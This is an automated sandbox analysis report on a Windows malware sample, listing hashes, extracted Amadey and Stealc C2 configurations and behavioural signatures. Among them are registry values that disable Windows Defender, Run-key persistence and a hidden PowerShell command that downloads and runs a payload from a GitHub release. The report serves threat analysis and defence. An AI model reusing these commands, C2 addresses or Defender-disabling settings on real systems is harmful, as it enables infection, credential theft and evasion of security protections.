Analysis
-
max time kernel
86s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
24/03/2025, 09:07
Static task
static1
Behavioral task
behavioral1
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win10v2004-20250314-en
General
-
Target
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
-
Size
938KB
-
MD5
278fa6cdc2189c33b3cf59614d6d9e7f
-
SHA1
f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
-
SHA256
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
-
SHA512
76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
-
SSDEEP
24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 7 IoCs
resource yara_rule behavioral2/memory/1384-815-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-814-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-909-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-1042-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-1162-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-1221-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral2/memory/1384-1498-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4732-336-0x0000000000A60000-0x0000000000EA2000-memory.dmp healer behavioral2/memory/4732-335-0x0000000000A60000-0x0000000000EA2000-memory.dmp healer behavioral2/memory/4732-775-0x0000000000A60000-0x0000000000EA2000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ef54ab4fd5.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ef54ab4fd5.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ef54ab4fd5.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ef54ab4fd5.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ef54ab4fd5.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Vidar family
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000024142-294.dat family_xmrig behavioral2/files/0x0007000000024142-294.dat xmrig -
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e30a4e2837.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ef54ab4fd5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e96b36abf6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5d0ced5341.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 27 1892 powershell.exe 115 1220 powershell.exe 207 3460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1892 powershell.exe 1220 powershell.exe 3460 powershell.exe 4828 powershell.exe 2204 powershell.exe 2976 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 32 756 rapes.exe 115 1220 powershell.exe 207 3460 powershell.exe 27 1892 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2132 takeown.exe 3232 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 13 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5508 chrome.exe 5364 chrome.exe 2744 chrome.exe 6352 msedge.exe 4232 msedge.exe 7112 msedge.exe 4904 msedge.exe 5940 msedge.exe 3004 msedge.exe 6480 msedge.exe 628 msedge.exe 5964 msedge.exe 5504 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e30a4e2837.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5d0ced5341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5d0ced5341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ef54ab4fd5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e30a4e2837.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ef54ab4fd5.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation apple.exe -
Executes dropped EXE 19 IoCs
pid Process 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 756 rapes.exe 2580 cUpXaxB.exe 1840 apple.exe 4828 11.exe 4844 11.exe 1884 Jq0hGDZ.exe 2724 84c9895e7a.exe 4920 rapes.exe 3788 TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE 3832 483d2fa8a0d53818306efeb32d3.exe 2444 QL4t9UZ.exe 2544 5d0ced5341.exe 4708 e30a4e2837.exe 3304 winhost.exe 5076 winhost.exe 3288 de9077fc34.exe 4732 ef54ab4fd5.exe 1384 e96b36abf6.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine 5d0ced5341.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine e30a4e2837.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine ef54ab4fd5.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine e96b36abf6.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2132 takeown.exe 3232 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features ef54ab4fd5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ef54ab4fd5.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 8229 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84c9895e7a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\84c9895e7a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe'\"" QL4t9UZ.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Sleep -s 30; Start-Process 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe' -WindowStyle Hidden\"" QL4t9UZ.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\de9077fc34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319020101\\de9077fc34.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ef54ab4fd5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319030101\\ef54ab4fd5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d0ced5341.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319000101\\5d0ced5341.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e30a4e2837.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319010101\\e30a4e2837.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 264 pastebin.com 266 pastebin.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000e00000001e697-130.dat autoit_exe behavioral2/files/0x0007000000024144-303.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 1900 tasklist.exe 1376 tasklist.exe 3168 tasklist.exe 1392 tasklist.exe 6984 tasklist.exe 6624 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 924 TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE 756 rapes.exe 4920 rapes.exe 3788 TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE 3832 483d2fa8a0d53818306efeb32d3.exe 2544 5d0ced5341.exe 4708 e30a4e2837.exe 4732 ef54ab4fd5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4796 sc.exe 936 sc.exe 2944 sc.exe 3792 sc.exe 2924 sc.exe 3332 sc.exe 2976 sc.exe 4108 sc.exe 1488 sc.exe 2364 sc.exe 1976 sc.exe 2144 sc.exe 2868 sc.exe 1500 sc.exe 1452 sc.exe 1220 sc.exe 2876 sc.exe 5084 sc.exe 1404 sc.exe 4528 sc.exe 1812 sc.exe 1528 sc.exe 3988 sc.exe 2656 sc.exe 1848 sc.exe 372 sc.exe 4244 sc.exe 4080 sc.exe 988 sc.exe 2772 sc.exe 4672 sc.exe 2956 sc.exe 3452 sc.exe 4880 sc.exe 4620 sc.exe 908 sc.exe 3480 sc.exe 3124 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cUpXaxB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e30a4e2837.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef54ab4fd5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84c9895e7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d0ced5341.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de9077fc34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language de9077fc34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e96b36abf6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage de9077fc34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4632 timeout.exe 3184 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 3692 taskkill.exe 1372 taskkill.exe 2552 taskkill.exe 4848 taskkill.exe 3680 taskkill.exe 372 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 8 IoCs
pid Process 4568 reg.exe 1392 reg.exe 2732 reg.exe 4728 reg.exe 2828 reg.exe 5600 reg.exe 3616 reg.exe 3188 reg.exe -
Modifies system certificate store 2 TTPs 5 IoCs
